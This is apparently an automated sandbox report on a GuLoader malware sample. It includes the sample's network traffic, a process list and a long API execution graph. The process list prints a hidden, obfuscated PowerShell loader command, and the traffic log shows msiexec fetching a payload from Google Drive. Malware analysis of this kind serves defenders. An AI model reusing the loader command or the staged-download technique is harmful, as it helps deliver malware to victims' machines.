                                      Content-Security-Policy: script-src 'nonce-dXBpuLKJWtiyab9fCmAIDw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                      Cross-Origin-Opener-Policy: same-origin
                                      Server: ESF
                                      Content-Length: 0
                                      X-XSS-Protection: 0
                                      X-Frame-Options: SAMEORIGIN
                                      X-Content-Type-Options: nosniff
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Connection: close


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      11192.168.2.1049973142.250.181.14437252C:\Windows\SysWOW64\msiexec.exe
                                      TimestampBytes transferredDirectionData
                                      2024-12-03 15:42:46 UTC460OUTGET /download?id=1QYcmFXnrRWth2b0SOECGCfUV-uNnbJgW&export=download HTTP/1.1
                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                      Cache-Control: no-cache
                                      Host: drive.usercontent.google.com
                                      Connection: Keep-Alive
                                      Cookie: NID=519=2Bmo6H1NqPZiqrm873E0b5PCkfZgGampfX3e-UXspPEKHfUY4i7h6mAkEoBsDtFGYLCPzPBXj91lG01x__bCjbpO0MeybMByLnYmaFledtt8eAi-vn73Y_AsXTOe4TNBYln4L2i7u7rYNZzAGV8oyC8bfsWQuOL2qey0fKly1xhF6NXDy3nMclGa
                                      2024-12-03 15:42:47 UTC1854INHTTP/1.1 404 Not Found
                                      Content-Type: text/html; charset=utf-8
                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                      Pragma: no-cache
                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                      Date: Tue, 03 Dec 2024 15:42:47 GMT
                                      Content-Security-Policy: script-src 'nonce-2x3hlxUn2hfgTaPr_UuFOA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                      Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                      Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                      Cross-Origin-Opener-Policy: same-origin
                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                      Content-Length: 1652
                                      X-GUploader-UploadID: AFiumC7C-c8H1h2722goJP3tpQ84Ob2Ihon4k1h-1gncRhYz9Ux-A9nVZxj-r2o5LzKC9-ieiHEU64ARlw
                                      Server: UploadServer
                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                      Content-Security-Policy: sandbox allow-scripts
                                      Connection: close
                                      2024-12-03 15:42:47 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 68 4b 62 37 50 37 46 52 6a 43 46 72 5a 66 68 48 57 34 66 50 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0hKb7P7FRjCFrZfhHW4fPw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                      Click to jump to process

                                      Click to jump to process

                                      Click to dive into process behavior distribution

                                      Click to jump to process

                                      Target ID:0
                                      Start time:10:40:42
                                      Start date:03/12/2024
                                      Path:C:\Users\user\Desktop\beNxougDFV.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Users\user\Desktop\beNxougDFV.exe"
                                      Imagebase:0x400000
                                      File size:525'906 bytes
                                      MD5 hash:8A678142D7D4BD32F67A17757CC896A0
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:2
                                      Start time:10:40:45
                                      Start date:03/12/2024
                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      Wow64 process (32bit):true
                                      Commandline:"powershell.exe" -windowstyle hidden "$Goniac=Get-Content -raw 'C:\Users\user\AppData\Local\unshabbily\Specialeffektens.San246';$Floragraferedes=$Goniac.SubString(53737,3);.$Floragraferedes($Goniac)"
                                      Imagebase:0xc0000
                                      File size:433'152 bytes
                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:10:40:45
                                      Start date:03/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff620390000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:7
                                      Start time:10:41:56
                                      Start date:03/12/2024
                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                      Wow64 process (32bit):true
                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                      Imagebase:0x990000
                                      File size:59'904 bytes
                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000007.00000002.2594806253.00000000084FA000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                      Reputation:high
                                      Has exited:false

                                      Reset < >

                                        Execution Graph

                                        Execution Coverage:20.7%
                                        Dynamic/Decrypted Code Coverage:0%
                                        Signature Coverage:21.9%
                                        Total number of Nodes:1290
                                        Total number of Limit Nodes:31
                                        execution_graph 3845 4025c4 3854 402a9f 3845->3854 3847 4025ce 3848 405b40 ReadFile 3847->3848 3849 40263e 3847->3849 3850 40264e 3847->3850 3853 40263c 3847->3853 3848->3847 3857 405e8d wsprintfA 3849->3857 3852 402664 SetFilePointer 3850->3852 3850->3853 3852->3853 3855 405f51 17 API calls 3854->3855 3856 402ab4 3855->3856 3856->3847 3857->3853 3865 402245 3866 402ac1 17 API calls 3865->3866 3867 40224b 3866->3867 3868 402ac1 17 API calls 3867->3868 3869 402254 3868->3869 3870 402ac1 17 API calls 3869->3870 3871 40225d 3870->3871 3872 406232 2 API calls 3871->3872 3873 402266 3872->3873 3874 402277 lstrlenA lstrlenA 3873->3874 3875 40226a 3873->3875 3877 405056 24 API calls 3874->3877 3876 405056 24 API calls 3875->3876 3878 402272 3876->3878 3879 4022b3 SHFileOperationA 3877->3879 3879->3875 3879->3878 3332 401746 3333 402ac1 17 API calls 3332->3333 3334 40174d 3333->3334 3338 405af7 3334->3338 3336 401754 3337 405af7 2 API calls 3336->3337 3337->3336 3339 405b02 GetTickCount GetTempFileNameA 3338->3339 3340 405b33 3339->3340 3341 405b2f 3339->3341 3340->3336 3341->3339 3341->3340 3880 401947 3881 402ac1 17 API calls 3880->3881 3882 40194e lstrlenA 3881->3882 3883 402577 3882->3883 3884 4022c7 3885 4022ce 3884->3885 3886 4022e1 3884->3886 3887 405f51 17 API calls 3885->3887 3888 4022db 3887->3888 3889 40564b MessageBoxIndirectA 3888->3889 3889->3886 3890 40294a InvalidateRect 3891 402951 3890->3891 3892 404fca 3893 404fda 3892->3893 3894 404fee 3892->3894 3896 404fe0 3893->3896 3897 405037 3893->3897 3895 404ff6 IsWindowVisible 3894->3895 3903 40500d 3894->3903 3895->3897 3898 405003 3895->3898 3900 40403c SendMessageA 3896->3900 3899 40503c CallWindowProcA 3897->3899 3905 404921 SendMessageA 3898->3905 3902 404fea 3899->3902 3900->3902 3903->3899 3910 4049a1 3903->3910 3906 404980 SendMessageA 3905->3906 3907 404944 GetMessagePos ScreenToClient SendMessageA 3905->3907 3908 404978 3906->3908 3907->3908 3909 40497d 3907->3909 3908->3903 3909->3906 3919 405f2f lstrcpynA 3910->3919 3912 4049b4 3920 405e8d wsprintfA 3912->3920 3914 4049be 3915 40140b 2 API calls 3914->3915 3916 4049c7 3915->3916 3921 405f2f lstrcpynA 3916->3921 3918 4049ce 3918->3897 3919->3912 3920->3914 3921->3918 3925 4020cb 3926 402ac1 17 API calls 3925->3926 3927 4020d2 3926->3927 3928 402ac1 17 API calls 3927->3928 3929 4020dc 3928->3929 3930 402ac1 17 API calls 3929->3930 3931 4020e6 3930->3931 3932 402ac1 17 API calls 3931->3932 3933 4020f0 3932->3933 3934 402ac1 17 API calls 3933->3934 3935 4020fa 3934->3935 3936 40213c CoCreateInstance 3935->3936 3937 402ac1 17 API calls 3935->3937 3940 40215b 3936->3940 3942 402206 3936->3942 3937->3936 3938 401423 24 API calls 3939 40223c 3938->3939 3941 4021e6 MultiByteToWideChar 3940->3941 3940->3942 3941->3942 3942->3938 3942->3939 3943 4026ce 3944 4026d4 3943->3944 3945 4026d8 FindNextFileA 3944->3945 3948 4026ea 3944->3948 3946 402729 3945->3946 3945->3948 3949 405f2f lstrcpynA 3946->3949 3949->3948 3950 4023d0 3951 402ac1 17 API calls 3950->3951 3952 4023e2 3951->3952 3953 402ac1 17 API calls 3952->3953 3954 4023ec 3953->3954 3967 402b51 3954->3967 3957 402421 3959 40242d 3957->3959 3963 402a9f 17 API calls 3957->3963 3958 402ac1 17 API calls 3962 40241a lstrlenA 3958->3962 3961 40244c RegSetValueExA 3959->3961 3964 402f81 35 API calls 3959->3964 3960 402716 3965 402462 RegCloseKey 3961->3965 3962->3957 3963->3959 3964->3961 3965->3960 3968 402b6c 3967->3968 3971 405de3 3968->3971 3972 405df2 3971->3972 3973 4023fc 3972->3973 3974 405dfd RegCreateKeyExA 3972->3974 3973->3957 3973->3958 3973->3960 3974->3973 3975 4049d3 GetDlgItem GetDlgItem 3976 404a25 7 API calls 3975->3976 3988 404c3d 3975->3988 3977 404ac8 DeleteObject 3976->3977 3978 404abb SendMessageA 3976->3978 3979 404ad1 3977->3979 3978->3977 3980 404b08 3979->3980 3984 405f51 17 API calls 3979->3984 3982 403ff0 18 API calls 3980->3982 3981 404d21 3983 404dcd 3981->3983 3990 404c30 3981->3990 3994 404d7a SendMessageA 3981->3994 3989 404b1c 3982->3989 3985 404dd7 SendMessageA 3983->3985 3986 404ddf 3983->3986 3987 404aea SendMessageA SendMessageA 3984->3987 3985->3986 3997 404df1 ImageList_Destroy 3986->3997 3998 404df8 3986->3998 4005 404e08 3986->4005 3987->3979 3988->3981 3992 404921 5 API calls 3988->3992 4009 404cae 3988->4009 3993 403ff0 18 API calls 3989->3993 3995 404057 8 API calls 3990->3995 3991 404d13 SendMessageA 3991->3981 3992->4009 4010 404b2a 3993->4010 3994->3990 4000 404d8f SendMessageA 3994->4000 3996 404fc3 3995->3996 3997->3998 4001 404e01 GlobalFree 3998->4001 3998->4005 3999 404f77 3999->3990 4006 404f89 ShowWindow GetDlgItem ShowWindow 3999->4006 4003 404da2 4000->4003 4001->4005 4002 404bfe GetWindowLongA SetWindowLongA 4004 404c17 4002->4004 4014 404db3 SendMessageA 4003->4014 4007 404c35 4004->4007 4008 404c1d ShowWindow 4004->4008 4005->3999 4018 4049a1 4 API calls 4005->4018 4022 404e43 4005->4022 4006->3990 4027 404025 SendMessageA 4007->4027 4026 404025 SendMessageA 4008->4026 4009->3981 4009->3991 4010->4002 4013 404b79 SendMessageA 4010->4013 4015 404bf8 4010->4015 4016 404bb5 SendMessageA 4010->4016 4017 404bc6 SendMessageA 4010->4017 4013->4010 4014->3983 4015->4002 4015->4004 4016->4010 4017->4010 4018->4022 4019 404f4d InvalidateRect 4019->3999 4020 404f63 4019->4020 4028 4048dc 4020->4028 4021 404e71 SendMessageA 4025 404e87 4021->4025 4022->4021 4022->4025 4024 404efb SendMessageA SendMessageA 4024->4025 4025->4019 4025->4024 4026->3990 4027->3988 4031 404817 4028->4031 4030 4048f1 4030->3999 4032 40482d 4031->4032 4033 405f51 17 API calls 4032->4033 4034 404891 4033->4034 4035 405f51 17 API calls 4034->4035 4036 40489c 4035->4036 4037 405f51 17 API calls 4036->4037 4038 4048b2 lstrlenA wsprintfA SetDlgItemTextA 4037->4038 4038->4030 4039 401cd4 4040 402a9f 17 API calls 4039->4040 4041 401cda IsWindow 4040->4041 4042 401a0e 4041->4042 4043 4014d6 4044 402a9f 17 API calls 4043->4044 4045 4014dc Sleep 4044->4045 4047 402951 4045->4047 3342 401759 3343 402ac1 17 API calls 3342->3343 3344 401760 3343->3344 3345 401786 3344->3345 3346 40177e 3344->3346 3403 405f2f lstrcpynA 3345->3403 3402 405f2f lstrcpynA 3346->3402 3349 401784 3353 406199 5 API calls 3349->3353 3350 401791 3351 4058c7 3 API calls 3350->3351 3352 401797 lstrcatA 3351->3352 3352->3349 3369 4017a3 3353->3369 3354 406232 2 API calls 3354->3369 3355 405aa3 2 API calls 3355->3369 3357 4017ba CompareFileTime 3357->3369 3358 40187e 3360 405056 24 API calls 3358->3360 3359 401855 3362 405056 24 API calls 3359->3362 3370 40186a 3359->3370 3361 401888 3360->3361 3381 402f81 3361->3381 3362->3370 3363 405f2f lstrcpynA 3363->3369 3366 4018af SetFileTime 3368 4018c1 CloseHandle 3366->3368 3367 405f51 17 API calls 3367->3369 3368->3370 3371 4018d2 3368->3371 3369->3354 3369->3355 3369->3357 3369->3358 3369->3359 3369->3363 3369->3367 3380 405ac8 GetFileAttributesA CreateFileA 3369->3380 3404 40564b 3369->3404 3372 4018d7 3371->3372 3373 4018ea 3371->3373 3374 405f51 17 API calls 3372->3374 3375 405f51 17 API calls 3373->3375 3377 4018df lstrcatA 3374->3377 3378 4018f2 3375->3378 3377->3378 3379 40564b MessageBoxIndirectA 3378->3379 3379->3370 3380->3369 3383 402f97 3381->3383 3382 402fc2 3408 40315d 3382->3408 3383->3382 3418 403173 SetFilePointer 3383->3418 3387 4030fd 3389 403101 3387->3389 3393 403119 3387->3393 3388 402fdf GetTickCount 3400 402ff2 3388->3400 3391 40315d ReadFile 3389->3391 3390 40189b 3390->3366 3390->3368 3391->3390 3392 40315d ReadFile 3392->3393 3393->3390 3393->3392 3395 405b6f WriteFile 3393->3395 3394 40315d ReadFile 3394->3400 3395->3393 3397 403058 GetTickCount 3397->3400 3398 403081 MulDiv wsprintfA 3399 405056 24 API calls 3398->3399 3399->3400 3400->3390 3400->3394 3400->3397 3400->3398 3401 405b6f WriteFile 3400->3401 3411 40640c 3400->3411 3401->3400 3402->3349 3403->3350 3405 405660 3404->3405 3406 4056ac 3405->3406 3407 405674 MessageBoxIndirectA 3405->3407 3406->3369 3407->3406 3409 405b40 ReadFile 3408->3409 3410 402fcd 3409->3410 3410->3387 3410->3388 3410->3390 3412 406431 3411->3412 3413 406439 3411->3413 3412->3400 3413->3412 3414 4064c0 GlobalFree 3413->3414 3415 4064c9 GlobalAlloc 3413->3415 3416 406540 GlobalAlloc 3413->3416 3417 406537 GlobalFree 3413->3417 3414->3415 3415->3412 3415->3413 3416->3412 3416->3413 3417->3416 3418->3382 4048 401659 4049 402ac1 17 API calls 4048->4049 4050 40165f 4049->4050 4051 406232 2 API calls 4050->4051 4052 401665 4051->4052 4053 401959 4054 402a9f 17 API calls 4053->4054 4055 401960 4054->4055 4056 402a9f 17 API calls 4055->4056 4057 40196d 4056->4057 4058 402ac1 17 API calls 4057->4058 4059 401984 lstrlenA 4058->4059 4060 401994 4059->4060 4061 4019d4 4060->4061 4065 405f2f lstrcpynA 4060->4065 4063 4019c4 4063->4061 4064 4019c9 lstrlenA 4063->4064 4064->4061 4065->4063 4066 401e59 4067 402ac1 17 API calls 4066->4067 4068 401e5f 4067->4068 4069 402ac1 17 API calls 4068->4069 4070 401e68 4069->4070 4071 402ac1 17 API calls 4070->4071 4072 401e71 4071->4072 4073 402ac1 17 API calls 4072->4073 4074 401e7a 4073->4074 4075 401423 24 API calls 4074->4075 4076 401e81 4075->4076 4083 405611 ShellExecuteExA 4076->4083 4078 401ebc 4079 40633c 5 API calls 4078->4079 4081 402716 4078->4081 4080 401ed6 CloseHandle 4079->4080 4080->4081 4083->4078 3419 401edb 3420 402ac1 17 API calls 3419->3420 3421 401ee1 3420->3421 3422 405056 24 API calls 3421->3422 3423 401eeb 3422->3423 3434 4055ce CreateProcessA 3423->3434 3426 401f12 CloseHandle 3430 402716 3426->3430 3429 401f06 3431 401f14 3429->3431 3432 401f0b 3429->3432 3431->3426 3442 405e8d wsprintfA 3432->3442 3435 405601 CloseHandle 3434->3435 3436 401ef1 3434->3436 3435->3436 3436->3426 3436->3430 3437 40633c WaitForSingleObject 3436->3437 3438 406356 3437->3438 3439 406368 GetExitCodeProcess 3438->3439 3443 406303 3438->3443 3439->3429 3442->3426 3444 406320 PeekMessageA 3443->3444 3445 406330 WaitForSingleObject 3444->3445 3446 406316 DispatchMessageA 3444->3446 3445->3438 3446->3444 4091 401f5b 4092 402ac1 17 API calls 4091->4092 4093 401f62 4092->4093 4094 4062c7 5 API calls 4093->4094 4095 401f71 4094->4095 4096 401ff1 4095->4096 4097 401f89 GlobalAlloc 4095->4097 4097->4096 4098 401f9d 4097->4098 4099 4062c7 5 API calls 4098->4099 4100 401fa4 4099->4100 4101 4062c7 5 API calls 4100->4101 4102 401fae 4101->4102 4102->4096 4106 405e8d wsprintfA 4102->4106 4104 401fe5 4107 405e8d wsprintfA 4104->4107 4106->4104 4107->4096 4108 40255b 4109 402ac1 17 API calls 4108->4109 4110 402562 4109->4110 4113 405ac8 GetFileAttributesA CreateFileA 4110->4113 4112 40256e 4113->4112 3800 401b5d 3801 401b6a 3800->3801 3802 401bae 3800->3802 3805 4022ce 3801->3805 3810 401b81 3801->3810 3803 401bb2 3802->3803 3804 401bd7 GlobalAlloc 3802->3804 3814 401bf2 3803->3814 3821 405f2f lstrcpynA 3803->3821 3806 405f51 17 API calls 3804->3806 3807 405f51 17 API calls 3805->3807 3806->3814 3809 4022db 3807->3809 3813 40564b MessageBoxIndirectA 3809->3813 3819 405f2f lstrcpynA 3810->3819 3811 401bc4 GlobalFree 3811->3814 3813->3814 3815 401b90 3820 405f2f lstrcpynA 3815->3820 3817 401b9f 3822 405f2f lstrcpynA 3817->3822 3819->3815 3820->3817 3821->3811 3822->3814 4114 401a5e 4115 402a9f 17 API calls 4114->4115 4116 401a64 4115->4116 4117 402a9f 17 API calls 4116->4117 4118 401a0e 4117->4118 4119 4024df 4129 402b01 4119->4129 4122 402a9f 17 API calls 4123 4024f2 4122->4123 4124 402519 RegEnumValueA 4123->4124 4125 40250d RegEnumKeyA 4123->4125 4127 402716 4123->4127 4126 40252e RegCloseKey 4124->4126 4125->4126 4126->4127 4130 402ac1 17 API calls 4129->4130 4131 402b18 4130->4131 4132 405db5 RegOpenKeyExA 4131->4132 4133 4024e9 4132->4133 4133->4122 4134 404460 4135 40448c 4134->4135 4136 40449d 4134->4136 4195 40562f GetDlgItemTextA 4135->4195 4138 4044a9 GetDlgItem 4136->4138 4145 404508 4136->4145 4140 4044bd 4138->4140 4139 404497 4142 406199 5 API calls 4139->4142 4143 4044d1 SetWindowTextA 4140->4143 4148 405960 4 API calls 4140->4148 4141 4045ec 4144 404796 4141->4144 4197 40562f GetDlgItemTextA 4141->4197 4142->4136 4149 403ff0 18 API calls 4143->4149 4147 404057 8 API calls 4144->4147 4145->4141 4145->4144 4150 405f51 17 API calls 4145->4150 4155 4047aa 4147->4155 4156 4044c7 4148->4156 4152 4044ed 4149->4152 4153 40457c SHBrowseForFolderA 4150->4153 4151 40461c 4154 4059b5 18 API calls 4151->4154 4157 403ff0 18 API calls 4152->4157 4153->4141 4158 404594 CoTaskMemFree 4153->4158 4159 404622 4154->4159 4156->4143 4162 4058c7 3 API calls 4156->4162 4160 4044fb 4157->4160 4161 4058c7 3 API calls 4158->4161 4198 405f2f lstrcpynA 4159->4198 4196 404025 SendMessageA 4160->4196 4164 4045a1 4161->4164 4162->4143 4167 4045d8 SetDlgItemTextA 4164->4167 4171 405f51 17 API calls 4164->4171 4166 404501 4169 4062c7 5 API calls 4166->4169 4167->4141 4168 404639 4170 4062c7 5 API calls 4168->4170 4169->4145 4178 404640 4170->4178 4172 4045c0 lstrcmpiA 4171->4172 4172->4167 4175 4045d1 lstrcatA 4172->4175 4173 40467c 4199 405f2f lstrcpynA 4173->4199 4175->4167 4176 404683 4177 405960 4 API calls 4176->4177 4179 404689 GetDiskFreeSpaceA 4177->4179 4178->4173 4182 40590e 2 API calls 4178->4182 4184 4046d4 4178->4184 4181 4046ad MulDiv 4179->4181 4179->4184 4181->4184 4182->4178 4183 404745 4186 404768 4183->4186 4188 40140b 2 API calls 4183->4188 4184->4183 4185 4048dc 20 API calls 4184->4185 4187 404732 4185->4187 4200 404012 KiUserCallbackDispatcher 4186->4200 4190 404747 SetDlgItemTextA 4187->4190 4191 404737 4187->4191 4188->4186 4190->4183 4193 404817 20 API calls 4191->4193 4192 404784 4192->4144 4201 4043b9 4192->4201 4193->4183 4195->4139 4196->4166 4197->4151 4198->4168 4199->4176 4200->4192 4202 4043c7 4201->4202 4203 4043cc SendMessageA 4201->4203 4202->4203 4203->4144 4204 402c61 4205 402c70 SetTimer 4204->4205 4206 402c89 4204->4206 4205->4206 4207 402cde 4206->4207 4208 402ca3 MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 4206->4208 4208->4207 4209 401563 4210 4028f9 4209->4210 4213 405e8d wsprintfA 4210->4213 4212 4028fe 4213->4212 4214 40166a 4215 402ac1 17 API calls 4214->4215 4216 401671 4215->4216 4217 402ac1 17 API calls 4216->4217 4218 40167a 4217->4218 4219 402ac1 17 API calls 4218->4219 4220 401683 MoveFileA 4219->4220 4221 40168f 4220->4221 4222 401696 4220->4222 4223 401423 24 API calls 4221->4223 4224 406232 2 API calls 4222->4224 4226 40223c 4222->4226 4223->4226 4225 4016a5 4224->4225 4225->4226 4227 405d0e 36 API calls 4225->4227 4227->4221 4228 40246d 4229 402b01 17 API calls 4228->4229 4230 402477 4229->4230 4231 402ac1 17 API calls 4230->4231 4232 402480 4231->4232 4233 402716 4232->4233 4234 40248a RegQueryValueExA 4232->4234 4235 4024aa 4234->4235 4238 4024b0 RegCloseKey 4234->4238 4235->4238 4239 405e8d wsprintfA 4235->4239 4238->4233 4239->4238 4240 4019ed 4241 402ac1 17 API calls 4240->4241 4242 4019f4 4241->4242 4243 402ac1 17 API calls 4242->4243 4244 4019fd 4243->4244 4245 401a04 lstrcmpiA 4244->4245 4246 401a16 lstrcmpA 4244->4246 4247 401a0a 4245->4247 4246->4247 4248 40156f 4249 401586 4248->4249 4250 40157f ShowWindow 4248->4250 4251 401594 ShowWindow 4249->4251 4252 402951 4249->4252 4250->4249 4251->4252 4267 4014f4 SetForegroundWindow 4268 402951 4267->4268 4269 401cf5 4270 402a9f 17 API calls 4269->4270 4271 401cfc 4270->4271 4272 402a9f 17 API calls 4271->4272 4273 401d08 GetDlgItem 4272->4273 4274 402577 4273->4274 4275 4022f6 4276 4022fe 4275->4276 4280 402304 4275->4280 4277 402ac1 17 API calls 4276->4277 4277->4280 4278 402ac1 17 API calls 4279 402314 4278->4279 4281 402ac1 17 API calls 4279->4281 4283 402322 4279->4283 4280->4278 4280->4279 4281->4283 4282 402ac1 17 API calls 4284 40232b WritePrivateProfileStringA 4282->4284 4283->4282 4292 4026f8 4293 402ac1 17 API calls 4292->4293 4294 4026ff FindFirstFileA 4293->4294 4295 402722 4294->4295 4299 402712 4294->4299 4296 402729 4295->4296 4300 405e8d wsprintfA 4295->4300 4301 405f2f lstrcpynA 4296->4301 4300->4296 4301->4299 4302 40237b 4303 402382 4302->4303 4304 4023ad 4302->4304 4306 402b01 17 API calls 4303->4306 4305 402ac1 17 API calls 4304->4305 4307 4023b4 4305->4307 4308 402389 4306->4308 4313 402b7f 4307->4313 4310 4023c1 4308->4310 4311 402ac1 17 API calls 4308->4311 4312 40239a RegDeleteValueA RegCloseKey 4311->4312 4312->4310 4314 402b95 4313->4314 4315 402bab 4314->4315 4317 402bb4 4314->4317 4315->4310 4318 405db5 RegOpenKeyExA 4317->4318 4319 402be2 4318->4319 4320 402c08 RegEnumKeyA 4319->4320 4321 402c1f RegCloseKey 4319->4321 4322 402c40 RegCloseKey 4319->4322 4325 402bb4 6 API calls 4319->4325 4326 402c33 4319->4326 4320->4319 4320->4321 4323 4062c7 5 API calls 4321->4323 4322->4326 4324 402c2f 4323->4324 4324->4326 4327 402c4e RegDeleteKeyA 4324->4327 4325->4319 4326->4315 4327->4326 3823 401ffd 3824 4020bd 3823->3824 3825 40200f 3823->3825 3827 401423 24 API calls 3824->3827 3826 402ac1 17 API calls 3825->3826 3828 402016 3826->3828 3834 40223c 3827->3834 3829 402ac1 17 API calls 3828->3829 3830 40201f 3829->3830 3831 402034 LoadLibraryExA 3830->3831 3832 402027 GetModuleHandleA 3830->3832 3831->3824 3833 402044 GetProcAddress 3831->3833 3832->3831 3832->3833 3835 402090 3833->3835 3836 402053 3833->3836 3837 405056 24 API calls 3835->3837 3838 401423 24 API calls 3836->3838 3839 402063 3836->3839 3837->3839 3838->3839 3839->3834 3840 4020b1 FreeLibrary 3839->3840 3840->3834 4328 40257d 4329 402582 4328->4329 4330 402596 4328->4330 4331 402a9f 17 API calls 4329->4331 4332 402ac1 17 API calls 4330->4332 4334 40258b 4331->4334 4333 40259d lstrlenA 4332->4333 4333->4334 4335 405b6f WriteFile 4334->4335 4336 4025bf 4334->4336 4335->4336 4337 4018fd 4338 401934 4337->4338 4339 402ac1 17 API calls 4338->4339 4340 401939 4339->4340 4341 4056f7 67 API calls 4340->4341 4342 401942 4341->4342 4343 401000 4344 401037 BeginPaint GetClientRect 4343->4344 4346 40100c DefWindowProcA 4343->4346 4347 4010f3 4344->4347 4348 401179 4346->4348 4349 401073 CreateBrushIndirect FillRect DeleteObject 4347->4349 4350 4010fc 4347->4350 4349->4347 4351 401102 CreateFontIndirectA 4350->4351 4352 401167 EndPaint 4350->4352 4351->4352 4353 401112 6 API calls 4351->4353 4352->4348 4353->4352 4354 401900 4355 402ac1 17 API calls 4354->4355 4356 401907 4355->4356 4357 40564b MessageBoxIndirectA 4356->4357 4358 401910 4357->4358 4359 401502 4360 40150a 4359->4360 4361 40151d 4359->4361 4362 402a9f 17 API calls 4360->4362 4362->4361 4363 402682 4364 402689 4363->4364 4366 4028fe 4363->4366 4365 402a9f 17 API calls 4364->4365 4367 402690 4365->4367 4368 40269f SetFilePointer 4367->4368 4368->4366 4369 4026af 4368->4369 4371 405e8d wsprintfA 4369->4371 4371->4366 4372 404104 lstrcpynA lstrlenA 4373 401c04 4374 